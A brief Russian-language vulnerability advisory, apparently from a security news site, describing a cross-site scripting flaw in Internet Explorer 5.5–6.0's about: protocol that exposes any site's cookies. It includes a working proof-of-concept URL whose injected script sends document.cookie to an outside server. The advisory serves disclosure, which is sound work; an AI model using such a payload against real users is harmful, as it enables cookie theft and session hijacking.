Internet Explorer содержит уязвимость, которая
позволяет нападающему построить URL, который
отобразит или изменит информацию cookies,
связанную с произвольным web узлом. Если URL
составлен в about:protocol, то Javascript, внедренный в
URL, может обращаться к любому cookies, связанным
с web узлом через ‘document.cookie’. Выполнение Javascript
возможно из-за уязвимости cross-site scripting в about:
protocol. 

Этот URL покажет содержание cookies, выпущенных ‘www.xakep.ru": 

about://www.xakep.ru/<script%20language=javascript> document.location=
‘http://www.solutions.fi/~jouko/cookies2.cgi?’ +document.cookie;</script>

Другие примеры можно просмотреть здесь:

http://www.solutions.fi/index.cgi/extra_iebug?lang=eng

Уязвимая система: Internet Explorer 5.5-6.0.

Более подробно об уязвимостях данного типа
можно узнать здесь:

http://www.securitylab.ru/owasp/OWASP-IV-CSS-1.htm



Оставить мнение